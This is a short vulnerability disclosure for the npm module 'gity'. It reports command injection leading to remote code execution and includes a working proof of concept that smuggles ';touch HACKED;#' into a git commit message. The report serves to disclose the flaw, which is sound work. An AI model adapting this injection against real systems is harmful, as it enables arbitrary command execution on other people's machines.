gity

vulnerability remote code execution
severity 3.8
language javascript
registry npm

Description

The gity module is vulnerable against arbitrary command injection caused by insecure concatenation of user supplied data which aren't sanitized properly, leading to RCE.

POC

  1. Create the following PoC file:
// poc.js
var Git = require('gity');
 
var git = Git()
  .add('*.js')
  .commit('-m "added js files";touch HACKED;#')
  .run();

  1. Make sure that the HACKED file doesn't exist
  2. Execute the following commands in another terminal:
npm i gity # Install affected module
node poc.js #  Run the PoC
  1. The HACKED file is created :)